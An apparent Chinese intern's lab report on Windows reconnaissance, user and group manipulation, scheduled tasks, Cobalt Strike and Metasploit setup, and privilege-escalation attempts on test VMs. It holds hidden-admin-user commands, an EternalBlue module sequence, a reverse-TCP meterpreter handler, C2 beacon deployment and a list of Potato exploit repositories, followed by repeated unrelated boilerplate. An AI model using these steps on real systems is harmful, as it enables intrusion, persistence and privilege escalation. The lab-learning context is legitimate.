实习第九天报告(9.5)

知识点

Windows相关知识

Windows下信息收集

systeminfo打印系统信息
whoami获取当前用户名
whoami /priv当前账户权限
ipconfig网络配置信息
ipconfig /displaydns显示DNS缓存
arp -a打印arp表
net user列出用户
net user username关于用户的信息
net localgroup列出所有组
net localgroup GROUP关于指定组的信息
tasklist /svc列出进程列表
net start列出启动的服务
ver操作系统版本类型

Windows权限

System:系统组,拥有管理系统资源的权限,包括文件、目录和注册表等。
Administrators:管理员组,具有对计算机进行完全访问和操作的权限。
Users:用户组,一般用户的默认组别,拥有较低的系统权限。
Guests:访客组,可以访问计算机上的公共文件夹和打印机,但不能更改配置和安装程序。
Backup Operators:备份操作员组,允许用户备份和还原数据,但不能更改配置安装程序。
Power Users:高级用户组,拥有比一般用户更高的系统权限,但比管理员组权限低。

Windows的默认用户账户
默认用户账户含义说明
Administrator管理员用户管理计算机(域)的内置帐户(默认禁用)
DefaultAccount默认账户系统管理的用户帐户(默认禁用)
defaultuser0默认用户(默认禁用)
Guest来宾用户提供给访客人员使用(默认禁用)
WDAGUtilityAccountWindows Defender用户系统为 Windows Defender 应用程序防护方案管理和使用的用户帐户(默认禁用)
与windows组件关联的用户账户
Windows组件关联的用户含义说明
System本地系统用户为windows的核心组件访问文件等资源提供权限
Local Service本地服务用户预设的拥有最小权限的本地账户
Network Service网络服务用户具有运行网络服务权限的计算机账户

拥有的权限大小:System > Administrator > User > Guest

Windows下管理用户组

新增、删除用户

net user 用户名 /add/del

新增、删除隐藏用户

net user 用户名$ /add/del

新增、删除用户组

net localgroup 组名 /add/del

添加用户到用户组、从用户组中删除用户

net localgroup 组名 用户名 /add/del

将普通用户添加到管理员用户(提权)

net localgroup Administrators 用户名 /add

Windows任务计划程序

系统自带的计划任务是一款不可缺少的重要工具之一,我们可以通过计划任务自定义设置这行任务,比如运行软件、系统关机等

任务计划程序在windows绝大多数版本都是系统自带,可以通过一下入口找到,以本机为例

创建任务

其中创建任务分创建基本任务和创建任务,这两者本身并没有区别,只是创建的过程,一个是可以最简化的任务创建方式,一个是完整的创建窗口页面,所以这次只介绍创建任务,他本身就包含了创建基本任务。

schtasks命令:

    schtasks /create /tn "My Daily Script" /tr W:\Users\asus\Desktop\1111.txt /sc daily /st 09:00 /rl HIGHEST /f
	# 查询指定名称计划任务
	schtasks /query | findstr "My Daily Script"
	# 删除指定名称计划任务
	schtasks /delete /tn "My Daily Script" /f
	# 查询所有计划任务
	schtasks /query

# 创建计划任务:/create
	1.每天固定时间,以普通权限启动notepad.exe
	schtasks /create /tn testservicel /sc daily /st 01:02 /tr notepad.exe
	2.每天固定时间,以system权限启动notepad.exe
	schtasks /create /tn testservice2 /sc daily /st 01:02 /tr notepad.exe /rl highest
# 查看计划任务:/query
schtasks /query /tn testservicel
# 修改计划任务:/change
schtasks /change /tn "testservicel" /st 14:00
# 删除计划任务:/delete
schtasks /delete /tn testservicel [f]

更多详细内容请看掌握 Windows 10 中的内置任务计划程序:分步指南

CS安装配置

Cobalt Strike 是一款专业的渗透测试和红队操作工具,旨在帮助安全专家模拟真实的攻击场景。它拥有强大的命令与控制(C2)功能、丰富的后渗透模块和灵活的脚本支持,使其成为安全评估和攻击模拟的重要工具。在高级渗透测试和红队操作领域,Cobalt Strike提供了丰富的功能和强大的模块,用于模拟高级持续性威胁(APT),执行复杂的攻击链条,并帮助组织评估和提升其安全防护能力

下载CobaltStrike后解压,将Server文件夹复制到vps中,并使用命令给予执行权限:

chmod +x teamserver
chmod +x TeamServerImage

使用命令Server端启动命令

./teamserver <host> <password> [/path/to/c2.profile] [YYYY-MM-DD]
<host> 必需参数 团队服务器IP
<password> 必需参数 连接服务器的密码
[/path/to/c2.profile] 可选参数 指定C2通信配置文件
[YYYY-MM-DD] 可选参数 所有payload的终止时间

本机打开client目录下的Cobalt_Strike_CN.bat文件

使用vpn地址以及设置的密码登录

进入主界面后,设置监听器listener

然后选择有效载荷,监听器选择listener1,生成Windows可执行文件beacon_x64.exe

双击可执行文件,可以发现视图中多了一项

设置sleep为1s

测试VNC交互功能,如图,成功连接

安装CS插件,添加如下插件,方便后续进行提权操作

MSF安装配置

安装MSF

一句话安装

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

安装完成后,使用命令msfconsole启用框架,查看开始界面

其他基本使用命令如下:

msfconsole										    #进入框架
search  ms17_010                                    # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue        # 使用use进入模块
info     										    #使用info查看模块信息
set payload windows/x64/meterpreter/reverse_tcp    	#设置攻击载荷
show options    									#查看模块需要配置的参数
set  rhosts 'hostip' / rport 'port'				    #设置参数
exploit / run     								    #攻击

在实际提权操作中,我们使用MSF进行提权操作时,通常是先search查找网页相关漏洞,选择等级高的、较新的漏洞,use进入模块,info查看模块信息,set攻击ip和端口,开始攻击,然后getshell,获取主机信息,再针对其进行木马上传,完成相关提权操作

手工提权思路

信息收集:收集系统信息,补丁信息,杀软等。

筛选:筛选可能存在的exp,利用exp进行攻击获取权限

EXP获取:

​​​​​​https://github.com/Ascotbe/Kernelhub
http://kernelhub.ascotbe.com/Windows/Docs/#/
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/nomi-sec/PoC-in-GitHub
https://gitlab.com/exploit-database/exploitdb

土豆大全

各类土豆下载:

烂土豆https://github.com/BeichenDream/BadPotato
神土豆https://github.com/BeichenDream/GodPotato
甜土豆https://github.com/CCob/SweetPotato
糖土豆https://github.com/klezVirus/CandyPotato
流氓土豆https://github.com/antonioCoco/RoguePotato
多重土豆https://github.com/S3cur3Th1sSh1t/MultiPotato
拉丝曼土豆https://github.com/crisprss/RasmanPotato
小土豆https://github.com/wh0amitz/PetitPotato
多汁土豆https://github.com/antonioCoco/JuicyPotatoNG
打印土豆https://github.com/BeichenDream/PrintNotifyPotato
强迫土豆https://github.com/Prepouce/CoercedPotato

提权实操

CS插件提权

将之前CS生成的可执行文件复制到WinServer2012虚拟机内,双击运行

可以看到本机CS内多了一条虚拟机会话,同样将回连间隔设置为1s

使用CS插件对虚拟机进行提权

JuicyPotato提权成功,但创建会话失败

MS16-032提权成功,且成功创建会话

在会话交互里使用shell whoami命令查看权限,成功

MS16-135提权成功,且成功创建会话

在会话交互里使用shell whoami命令查看权限,成功

各类土豆手工提权

GodPotato

Win10

GodPotato-NET4.exe:失败

GodPotato-NET35.exe:失败

GodPotato-NET2.exe:失败

WinServer2012

GodPotato-NET4.exe:失败

GodPotato-NET35.exe:失败

GodPotato-NET2.exe:失败

PetitPotato

Win10

失败

WinServer2012

失败

JuicyPotato

Win10

失败

WinServer2012

PrintNotifyPotato

Win10

三个版本均失败

WinServer2012

三个版本均失败

MSF提权

vps执行命令生成木马

将生成的木马文件msf.exe通过SFTP传到主机,再使用u盘从主机存到虚拟机WinServer2012

vps上执行命令开始监听

msfconsole    #启动msf
use exploit/multi/handler    #使用指定漏洞模块
set payload windows/meterpreter/reverse_tcp  	# 配置有效载荷
set lport 6666							# 配置监听端⼝
set lhost 0.0.0.0		# 配置监听地址
run # 开始监听

在win server 2012虚拟机中双击上面生成的msf.exe,vps这边就会显示建立会话成功

执行命令,找补丁,可能由于是才装的虚拟机,结果一个补丁都没找到

使用提权模块查找漏洞

完成后查看结果,可以看到绿色的就是可以利用的漏洞

这里我们选择挨个尝试可以利用的漏洞进行提权,每个都是同样的操作,进入框架、设置参数开始攻击,以下是各个漏洞提权结果

cve_2020_0787_bits_arbitrary_file_move:会话创建失败,提权失败

bypassuac_eventvwr:无会话创建,提权失败

bypassuac_sluihijack:无会话创建,提权失败

ms16_032_secondary_logon_handle_privesc:无会话创建,提权失败

ikeext_service:无会话创建,提权失败

tokenmagic:执行成功,且成功上传文件

查看虚拟机,文件成功上传

返回,getshell,执行刚刚上传的文件,发现提权失败,而且文件被删了,果然msf不好用QAQ,由于这里实在没有找到合适可用的提权木马,这里我们选择上传CS木马,再在CS里进行提权,上传CS默认木马

启动CS,开始监听

在msf上启用shell,运行cs.exe

在cs里可以看到winserver2012已成功上线

设置回连间隔为1s,使用插件提权,成功提权并创立会话,至此完成msf+CS联合提权

  • 15
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.md文件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值